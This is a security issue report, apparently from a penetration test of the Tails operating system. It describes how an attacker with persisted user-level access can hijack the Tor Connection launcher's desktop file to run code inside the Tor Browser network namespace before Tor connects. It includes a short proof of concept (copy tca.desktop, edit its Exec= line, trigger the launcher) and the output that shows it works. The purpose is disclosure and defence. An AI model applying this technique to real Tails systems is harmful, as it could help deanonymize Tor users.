See https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/4 This attack applies if an attacker has amnesia-level _and_ Tor is not bootstrapped. ## Summary ### Impact The attacker can gain information about your Tor Browser circuits, which could be used to deanonymize the user. Overall, this will be considered _Low_ in summit#191 ### Availability The attack is only available when the attacker has amnesia-level privileges _before_ the user connects to Tor. This requires a persistent attack (ie: in the past the attacker used to have amnesia-level privileges, and managed to persist themselves into the Persistent Storage), so this needs to be chained with more attacks to be done. It also requires user interaction ([citation needed](https://gitlab.tails.boum.org/tails/tails/-/issues/20733#note_252419)). ## Details ### Relevant code On `/usr/local/lib/run-tor-browser`: ```sh exec \ /bin/ip netns exec tbb \ sudo -u amnesia -- \ /usr/local/lib/run-with-env --env-file="${ENVFILE}" --delete -- \ /usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- \ /usr/bin/tor-browser "$@" ``` On `/usr/bin/tor-browser` : ```sh if tor_has_bootstrapped || ask_for_confirmation; then # Torbutton 1.5.1+ uses those environment variables export TOR_SOCKS_HOST='127.0.0.1' export TOR_SOCKS_PORT='9050' start_browser "${@}" else gtk-launch tca.desktop fi ``` ### PoC ```sh cp /usr/share/applications/tca.desktop /home/amnesia/.local/share/applications/ # Edit the file and change Exec= to anything you want e.g. Exec=sh -c 'echo `id`' # Trigger code exec /usr/local/lib/run-tor-browser # example output, nogroup means we are inside the brawp sandbox amnesia@amnesia:~$ /usr/local/lib/run-tor-browser uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup) ```